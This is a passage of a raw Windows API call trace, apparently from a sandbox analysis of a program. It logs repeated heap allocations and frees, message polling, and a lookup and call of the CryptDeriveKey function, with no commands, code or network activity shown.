hHeap=0x25c0000) returned 1 [0264.586] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0264.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0264.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0264.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0264.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0264.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0264.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0264.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0264.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0264.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0264.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.588] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0264.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0264.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0264.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0264.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0264.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0264.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0264.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0264.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0264.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0264.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0264.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0264.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0264.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0264.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0264.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0264.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0264.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0264.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0264.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x24a9ed0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0264.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0264.590] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDeriveKey") returned 0x74d83188 [0264.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0264.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0264.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0264.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0264.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0264.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2110 [0264.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0264.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0264.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0264.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0264.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2110 | out: hHeap=0x25c0000) returned 1 [0264.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0264.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0264.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0264.591] CryptDeriveKey (in: hProv=0xad2be8, Algid=0x6601, hBaseData=0xaa57a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa58a0) returned 1 [0264.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0264.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0264.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0264.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0264.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0264.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0264.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0264.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0264.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0264.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0264.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0264.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0264.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0264.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0264.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0264.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0264.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0264.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0264.592] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0264.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0264.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0264.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0264.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0264.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0264.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0264.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0264.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0264.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0264.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0264.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0264.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0264.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0264.593] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0264.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0264.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0264.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0264.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0264.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0264.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0264.594] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0264.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0264.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0264.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0264.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0264.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0264.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0264.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0264.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0264.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b50 | out: hHeap=0x25c0000) returned 1 [0264.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0264.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0264.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0264.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0264.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0264.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0264.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0264.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0264.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0264.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0264.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0264.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c90 | out: hHeap=0x25c0000) returned 1 [0264.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0264.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0264.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0264.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0264.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0264.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0264.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0264.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0264.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0264.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0264.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0264.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0264.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0264.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0264.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0264.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0264.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0264.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0264.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0264.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0264.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0264.596] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0264.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0264.597] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0264.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2120 [0264.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0264.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0264.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0264.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0264.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0264.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0264.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0264.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0264.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0264.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0264.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0264.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0264.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0264.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0264.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0264.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0264.598] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0264.598] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0264.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0264.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0264.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2120 [0264.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0264.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0264.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0264.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0264.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0264.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0264.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0264.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0264.598] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0264.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0264.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0264.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0264.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0264.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0264.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0264.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0264.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0264.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0264.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0264.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0264.599] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0264.599] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0264.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0264.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0264.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0264.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0264.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0264.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0264.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: 